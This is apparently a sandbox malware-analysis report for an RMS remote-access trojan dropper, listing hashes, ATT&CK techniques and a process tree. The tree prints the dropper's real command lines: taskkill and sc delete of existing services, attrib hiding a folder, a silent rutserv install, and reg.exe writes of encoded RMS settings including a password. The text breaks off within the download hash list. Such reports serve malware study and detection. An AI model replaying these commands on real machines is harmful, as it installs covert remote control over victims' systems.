rms | cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8

Analysis

max time kernel
148s
max time network
150s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
27-11-2022 04:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe
Size

3.3MB
MD5

3034a42900fbface754e83567cb1e8b8
SHA1

6538da3b999db0894615130fd300a4f2c225c108
SHA256

cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8
SHA512

28bc6dd4d9893afe881b0dd456fb361aa3b151e2f3330432a96cf7ae77c429b6d2ff7a503f62ce71a6e0d247f42aa94b36fd1f8f125548226ed5355a8ca60330
SSDEEP

98304:GsTpLAuoFngsWRfajfdJf+S8kvah7iy7cYiwOBpIeWH:GsTp8uoF7fdJmRkyh7iehi1zwH

Score

10^/10

rms evasion rat trojan

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Executes dropped EXE 9 IoCs

Processes:

7z.exeses.exerutserv.exerutserv.exerutserv.exerutserv.exerfusclient.exerfusclient.exerfusclient.exe

pid process

1940 7z.exe
1304 ses.exe
560 rutserv.exe
1284 rutserv.exe
1648 rutserv.exe
1332 rutserv.exe
1584 rfusclient.exe
1512 rfusclient.exe
1776 rfusclient.exe
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1724 attrib.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Loads dropped DLL 11 IoCs

Processes:

cmd.exe7z.execmd.exerutserv.exe

pid process

1608 cmd.exe
1608 cmd.exe
1940 7z.exe
1608 cmd.exe
1608 cmd.exe
1608 cmd.exe
556 cmd.exe
556 cmd.exe
556 cmd.exe
1332 rutserv.exe
1332 rutserv.exe

pid	process
1940	7z.exe
1304	ses.exe
560	rutserv.exe
1284	rutserv.exe
1648	rutserv.exe
1332	rutserv.exe
1584	rfusclient.exe
1512	rfusclient.exe
1776	rfusclient.exe

pid	process
1724	attrib.exe

pid	process
1608	cmd.exe
1608	cmd.exe
1940	7z.exe
1608	cmd.exe
1608	cmd.exe
1608	cmd.exe
556	cmd.exe
556	cmd.exe
556	cmd.exe
1332	rutserv.exe
1332	rutserv.exe

Drops file in Windows directory 43 IoCs

Processes:

cmd.exe

description	ioc	process
File created	C:\Windows\spom\18699a83-4b57-44b9-bfde-b2b85b872737.tmp	cmd.exe
File created	C:\Windows\spom\dd_wcf_CA_smci_20220812_140952_266.txt	cmd.exe
File created	C:\Windows\spom\java_install.log	cmd.exe
File created	C:\Windows\spom\lpksetup-20220812-142324-0.log	cmd.exe
File created	C:\Windows\spom\RD3D4D.tmp	cmd.exe
File created	C:\Windows\spom\3986caf0-bd86-493f-b9e1-ce2b1eb394e4.tmp	cmd.exe
File created	C:\Windows\spom\cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe	cmd.exe
File created	C:\Windows\spom\chrome_installer.log	cmd.exe
File created	C:\Windows\spom\FXSAPIDebugLogFile.txt	cmd.exe
File created	C:\Windows\spom\ASPNETSetup_00001.log	cmd.exe
File created	C:\Windows\spom\dd_vcredistMSI6466.txt	cmd.exe
File created	C:\Windows\spom\lpksetup-20220812-142614-0.log	cmd.exe
File created	C:\Windows\spom\RGID01C.tmp	cmd.exe
File created	C:\Windows\spom\ses.exe	cmd.exe
File created	C:\Windows\spom\dd_wcf_CA_smci_20220812_140953_935.txt	cmd.exe
File created	C:\Windows\spom\JavaDeployReg.log	cmd.exe
File created	C:\Windows\spom\ose00000.exe	cmd.exe
File created	C:\Windows\spom\wmsetup.log	cmd.exe
File created	C:\Windows\spom\dd_SetupUtility.txt	cmd.exe
File created	C:\Windows\spom\dd_vcredistUI6407.txt	cmd.exe
File created	C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220812_140937181-MSI_netfx_Full_x64.msi.txt	cmd.exe
File created	C:\Windows\spom\rfusclient.exe	cmd.exe
File created	C:\Windows\spom\RGID01C.tmp-tmp	cmd.exe
File created	C:\Windows\spom\SetupExe(202208121416244B4).log	cmd.exe
File created	C:\Windows\spom\rutserv.exe	cmd.exe
File created	C:\Windows\spom\c205eaa7-5a63-4b1a-b0c0-d53a66d519f7.tmp	cmd.exe
File created	C:\Windows\spom\d8667315-09fb-47ef-835f-3a194f2a9bbf.tmp	cmd.exe
File created	C:\Windows\spom\dd_vcredistUI6466.txt	cmd.exe
File created	C:\Windows\spom\jawshtml.html	cmd.exe
File created	C:\Windows\spom\jusched.log	cmd.exe
File created	C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220812_140937181.html	cmd.exe
File created	C:\Windows\spom\ASPNETSetup_00000.log	cmd.exe
File created	C:\Windows\spom\e67f403f-a7b8-407a-b1da-a644ca8862ae.tmp	cmd.exe
File created	C:\Windows\spom\lpksetup-20220812-143535-0.log	cmd.exe
File created	C:\Windows\spom\java_install_reg.log	cmd.exe
File created	C:\Windows\spom\lpksetup-20220812-142918-0.log	cmd.exe
File created	C:\Windows\spom\588e55d7-fe91-4bb6-b0fa-9e8aa46775d9.tmp	cmd.exe
File created	C:\Windows\spom\85268142-14ac-43d9-82ae-7929db33f992.tmp	cmd.exe
File created	C:\Windows\spom\Admin.bmp	cmd.exe
File created	C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt	cmd.exe
File created	C:\Windows\spom\dd_vcredistMSI6407.txt	cmd.exe
File created	C:\Windows\spom\f58a5d9e-148a-48de-8220-0cbbefe7cc39.tmp	cmd.exe
File created	C:\Windows\spom\lpksetup-20220812-143231-0.log	cmd.exe

Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exe

pid process

1288 sc.exe
1960 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

748 taskkill.exe
532 taskkill.exe
Runs net.exe

pid	process
1288	sc.exe
1960	sc.exe

pid	process
748	taskkill.exe
532	taskkill.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

rutserv.exerutserv.exerutserv.exerutserv.exerfusclient.exe

pid	process
560	rutserv.exe
560	rutserv.exe
560	rutserv.exe
560	rutserv.exe
1284	rutserv.exe
1284	rutserv.exe
1648	rutserv.exe
1648	rutserv.exe
1332	rutserv.exe
1332	rutserv.exe
1332	rutserv.exe
1332	rutserv.exe
1584	rfusclient.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

rfusclient.exe

pid process

1776 rfusclient.exe

pid	process
1776	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

taskkill.exetaskkill.exerutserv.exerutserv.exerutserv.exe

description	pid	process
Token: SeDebugPrivilege	748	taskkill.exe
Token: SeDebugPrivilege	532	taskkill.exe
Token: SeDebugPrivilege	560	rutserv.exe
Token: SeDebugPrivilege	1648	rutserv.exe
Token: SeTakeOwnershipPrivilege	1332	rutserv.exe
Token: SeTcbPrivilege	1332	rutserv.exe
Token: SeTcbPrivilege	1332	rutserv.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.execmd.exeses.execmd.exenet.exenet.exe

description	pid	process	target process
PID 1752 wrote to memory of 1608	1752	cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe	cmd.exe
PID 1752 wrote to memory of 1608	1752	cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe	cmd.exe
PID 1752 wrote to memory of 1608	1752	cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe	cmd.exe
PID 1752 wrote to memory of 1608	1752	cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe	cmd.exe
PID 1608 wrote to memory of 1940	1608	cmd.exe	7z.exe
PID 1608 wrote to memory of 1940	1608	cmd.exe	7z.exe
PID 1608 wrote to memory of 1940	1608	cmd.exe	7z.exe
PID 1608 wrote to memory of 1940	1608	cmd.exe	7z.exe
PID 1608 wrote to memory of 1304	1608	cmd.exe	ses.exe
PID 1608 wrote to memory of 1304	1608	cmd.exe	ses.exe
PID 1608 wrote to memory of 1304	1608	cmd.exe	ses.exe
PID 1608 wrote to memory of 1304	1608	cmd.exe	ses.exe
PID 1304 wrote to memory of 556	1304	ses.exe	cmd.exe
PID 1304 wrote to memory of 556	1304	ses.exe	cmd.exe
PID 1304 wrote to memory of 556	1304	ses.exe	cmd.exe
PID 1304 wrote to memory of 556	1304	ses.exe	cmd.exe
PID 556 wrote to memory of 748	556	cmd.exe	taskkill.exe
PID 556 wrote to memory of 748	556	cmd.exe	taskkill.exe
PID 556 wrote to memory of 748	556	cmd.exe	taskkill.exe
PID 556 wrote to memory of 748	556	cmd.exe	taskkill.exe
PID 556 wrote to memory of 532	556	cmd.exe	taskkill.exe
PID 556 wrote to memory of 532	556	cmd.exe	taskkill.exe
PID 556 wrote to memory of 532	556	cmd.exe	taskkill.exe
PID 556 wrote to memory of 532	556	cmd.exe	taskkill.exe
PID 556 wrote to memory of 632	556	cmd.exe	net.exe
PID 556 wrote to memory of 632	556	cmd.exe	net.exe
PID 556 wrote to memory of 632	556	cmd.exe	net.exe
PID 556 wrote to memory of 632	556	cmd.exe	net.exe
PID 632 wrote to memory of 328	632	net.exe	net1.exe
PID 632 wrote to memory of 328	632	net.exe	net1.exe
PID 632 wrote to memory of 328	632	net.exe	net1.exe
PID 632 wrote to memory of 328	632	net.exe	net1.exe
PID 556 wrote to memory of 1408	556	cmd.exe	net.exe
PID 556 wrote to memory of 1408	556	cmd.exe	net.exe
PID 556 wrote to memory of 1408	556	cmd.exe	net.exe
PID 556 wrote to memory of 1408	556	cmd.exe	net.exe
PID 1408 wrote to memory of 1860	1408	net.exe	net1.exe
PID 1408 wrote to memory of 1860	1408	net.exe	net1.exe
PID 1408 wrote to memory of 1860	1408	net.exe	net1.exe
PID 1408 wrote to memory of 1860	1408	net.exe	net1.exe
PID 556 wrote to memory of 1288	556	cmd.exe	sc.exe
PID 556 wrote to memory of 1288	556	cmd.exe	sc.exe
PID 556 wrote to memory of 1288	556	cmd.exe	sc.exe
PID 556 wrote to memory of 1288	556	cmd.exe	sc.exe
PID 556 wrote to memory of 1960	556	cmd.exe	sc.exe
PID 556 wrote to memory of 1960	556	cmd.exe	sc.exe
PID 556 wrote to memory of 1960	556	cmd.exe	sc.exe
PID 556 wrote to memory of 1960	556	cmd.exe	sc.exe
PID 556 wrote to memory of 1828	556	cmd.exe	reg.exe
PID 556 wrote to memory of 1828	556	cmd.exe	reg.exe
PID 556 wrote to memory of 1828	556	cmd.exe	reg.exe
PID 556 wrote to memory of 1828	556	cmd.exe	reg.exe
PID 556 wrote to memory of 1724	556	cmd.exe	attrib.exe
PID 556 wrote to memory of 1724	556	cmd.exe	attrib.exe
PID 556 wrote to memory of 1724	556	cmd.exe	attrib.exe
PID 556 wrote to memory of 1724	556	cmd.exe	attrib.exe
PID 556 wrote to memory of 560	556	cmd.exe	rutserv.exe
PID 556 wrote to memory of 560	556	cmd.exe	rutserv.exe
PID 556 wrote to memory of 560	556	cmd.exe	rutserv.exe
PID 556 wrote to memory of 560	556	cmd.exe	rutserv.exe
PID 556 wrote to memory of 1284	556	cmd.exe	rutserv.exe
PID 556 wrote to memory of 1284	556	cmd.exe	rutserv.exe
PID 556 wrote to memory of 1284	556	cmd.exe	rutserv.exe
PID 556 wrote to memory of 1284	556	cmd.exe	rutserv.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1724 attrib.exe

pid	process
1724	attrib.exe

C:\Users\Admin\AppData\Local\Temp\cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe
"C:\Users\Admin\AppData\Local\Temp\cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1752

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\F529.tmp\new.bat" "
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1608

C:\Users\Admin\AppData\Local\Temp\F529.tmp\7z.exe
7z x -psystem32.dll Sys.7z -oC:\Users\Admin\AppData\Local\Temp -y
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1940

C:\Users\Admin\AppData\Local\Temp\ses.exe
"C:\Users\Admin\AppData\Local\Temp\ses.exe" -p
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1304

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\FB9E.tmp\15971.bat" -p "
4⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:556

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rfusclient.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:748

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rutserv.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:532

C:\Windows\SysWOW64\net.exe
net stop netaservice
5⤵
- Suspicious use of WriteProcessMemory
PID:632

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop netaservice
6⤵
PID:328

C:\Windows\SysWOW64\net.exe
net stop rmanservice
5⤵
- Suspicious use of WriteProcessMemory
PID:1408

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop rmanservice
6⤵
PID:1860

C:\Windows\SysWOW64\sc.exe
sc delete netaservice
5⤵
- Launches sc.exe
PID:1288

C:\Windows\SysWOW64\sc.exe
sc delete rmanservice
5⤵
- Launches sc.exe
PID:1960

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
5⤵
PID:1828

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Windows\spom"
5⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1724

C:\Users\Admin\AppData\Local\Temp\rutserv.exe
"rutserv.exe" /silentinstall
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:560

C:\Users\Admin\AppData\Local\Temp\rutserv.exe
"rutserv.exe" /firewall
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1284

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "notification" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e002000760065007200730069006f006e003d0022003500360030003000360022003e003c007500730065003e0074007200750065003c002f007500730065003e003c0065006d00610069006c003e0070006c0075007400750073003100320033004000790061006e006400650078002e00720075003c002f0065006d00610069006c003e003c00690064003e007b00420044003600330046003600340038002d0043004300360043002d0034004200430033002d0041003100390046002d003800420041004400450045004200300030003700390033007d003c002f00690064003e003c00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e00660061006c00730065003c002f00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e003c00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e00660061006c00730065003c002f00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e003c00730065006e0074003e00660061006c00730065003c002f00730065006e0074003e003c00760065007200730069006f006e003e00350036003000300036003c002f00760065007200730069006f006e003e003c007000750062006c00690063005f006b00650079005f006d003e003c002f007000750062006c00690063005f006b00650079005f006d003e003c007000750062006c00690063005f006b00650079005f0065003e003c002f007000750062006c00690063005f006b00650079005f0065003e003c00700061007300730077006f00720064003e003c002f00700061007300730077006f00720064003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c0064006900730063006c00610069006d00650072003e003c002f0064006900730063006c00610069006d00650072003e003c002f0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e003e000d000a00
5⤵
PID:1080

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "UserAccess" /t REG_BINARY /d
5⤵
PID:1276

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Password" /t REG_BINARY /d 38003900440043004100460043003500460042003900450044004200380041003800370030003400350033003600390033003300350037003700340030003800440031003700410036003500390036003400390033003800460033004100340035003400380036003200370030003100310037004600420036003300390041003700350043004300310039004400360046003400380030003000460030003700320037003900370036004200370030004300420041003800340037003700390034003900300034003600450033003400360034003600350030004300430045004100410045003800390046004100430030003500390037004600390032003400
5⤵
PID:1984

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003500360030003000360022003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e00660061006c00730065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a00
5⤵
PID:1116

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020304506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c084869646553746f70080c497046696c7465725479706502021750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e6773080f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e0811557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e6574496449507636081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265081244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e6773081544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f6755736509055369644964061034313936322e37343233343034353134084c6963656e73657306ae524d532d462d31393738444135303863433339363536326343663341363644613832323265446269593253326459586c52664477776e4932314758554a4544683945586d78785030594756304a5856513066506a6c74446c465644676f424167526c645738645556554f446c5246446d463966674d494841494341514a76593370704167304c4177734d486c516d63323952566b554f41677765557a773562513458576c564c623168654e434a740d50726f787953657474696e67731428010000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223536303036223e3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a1144697361626c65496e7465726e65744964080b536166654d6f6465536574080000
5⤵
PID:1816

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Program Files\Remote Manipulator System - Host\rfusclient.exe"
5⤵
PID:276

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003500360030003000360022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00
5⤵
PID:624

C:\Users\Admin\AppData\Local\Temp\rutserv.exe
"rutserv.exe" /start
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1648

C:\Users\Admin\AppData\Local\Temp\rutserv.exe
C:\Users\Admin\AppData\Local\Temp\rutserv.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1332

C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1584

C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
C:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray
3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:1776

C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
C:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray
2⤵
- Executes dropped EXE
PID:1512

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\F529.tmp\7z.dll
Filesize
893KB

MD5
04ad4b80880b32c94be8d0886482c774

SHA1
344faf61c3eb76f4a2fb6452e83ed16c9cce73e0

SHA256
a1e1d1f0fff4fcccfbdfa313f3bdfea4d3dfe2c2d9174a615bbc39a0a6929338

SHA512
3e3aaf01b769471b18126e443a721c9e9a0269e9f5e48d0a10251bc1ee309855bd71ede266caa6828b007359b21ba562c2a5a3469078760f564fb7bd43acabfb

Download Submit
C:\Users\Admin\AppData\Local\Temp\F529.tmp\7z.exe
Filesize
160KB

MD5
a51d90f2f9394f5ea0a3acae3bd2b219

SHA1
20fea1314dbed552d5fedee096e2050369172ee1

SHA256
ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f

SHA512
c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\F529.tmp\7z.exe
Filesize
160KB

MD5
a51d90f2f9394f5ea0a3acae3bd2b219

SHA1
20fea1314dbed552d5fedee096e2050369172ee1

SHA256
ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f

SHA512
c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\F529.tmp\Sys.7z
Filesize
2.2MB

MD5
be88b8b3ce26e220162b65029b3f0b38

SHA1
468389733444173e91f2ac208d500deed637a241

SHA256
502b5953ebbe874002969c68d581cdb83dcf2fc4e83cc4a6f9637a0b486ed4b5

SHA512
36f268fa91244da34148803896a989d385bb7a0bfafe2908ca326e8f099d69791d5a32fa6b6b8ef0427adf7c128c844b6c79c246df7638e81afb7693f2784dcb

Download Submit
C:\Users\Admin\AppData\Local\Temp\F529.tmp\new.bat
Filesize
65B

MD5
13310849fd8d70c608fd7b02fa86eea5

SHA1
9e79bc5cc474fefbe6ec40f8403ba74bb271f393

SHA256
03d09ae50ba37137bb7aa3a3290224a5e91d482b933a839a75797ea5c23e9b42

SHA512
909a92f88da3d2ac6464e2c616976dae2d1ce97d01925473cf3e93a364a4bdc646d9d95412aff95876e614163447420faa68cf3bac33fed6d7220b195e838c30

Download Submit
C:\Users\Admin\AppData\Local\Temp\FB9E.tmp\15971.bat
Filesize
10KB

MD5
64736420a3b8c3061f89d2bdac26465c

SHA1
306f8e23b6c979e863cca7f238dd229543e40b35

SHA256
ee83c47bbf15ba057fcd6beb952fb902b38dcab7f7465e6f4f6be533ef2cc119

SHA512
9983348bbbabefe96db162970d1f5bcd7055c9f975abb00d06b3784a586a59229dbd6a9cf97400cba9ce1e56fab219fa5840d0fe7b1d0f3de7784c3b4e574add

Download Submit
C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
Filesize
4.8MB

MD5
71abd0cadb18ddcb92a4dc990a29824b

SHA1
d640ecac5ef9db4a642357a5b187c778798a9459

SHA256
e91a657f6a87fb9be6f57c7c4097fdfa23e353a23caeb03c18987e718567b605

SHA512
51c38a9611cb36e60021c7f473893c5d608bce7ee9f482574b4657fb52cc5e1dcc41ef207e5d3a8570d886ca6611c72351d72cb7d7b0f02a606114add7c94a8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
Filesize
4.8MB

MD5
71abd0cadb18ddcb92a4dc990a29824b

SHA1
d640ecac5ef9db4a642357a5b187c778798a9459

SHA256
e91a657f6a87fb9be6f57c7c4097fdfa23e353a23caeb03c18987e718567b605

SHA512
51c38a9611cb36e60021c7f473893c5d608bce7ee9f482574b4657fb52cc5e1dcc41ef207e5d3a8570d886ca6611c72351d72cb7d7b0f02a606114add7c94a8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
Filesize
4.8MB

MD5
71abd0cadb18ddcb92a4dc990a29824b

SHA1
d640ecac5ef9db4a642357a5b187c778798a9459

SHA256
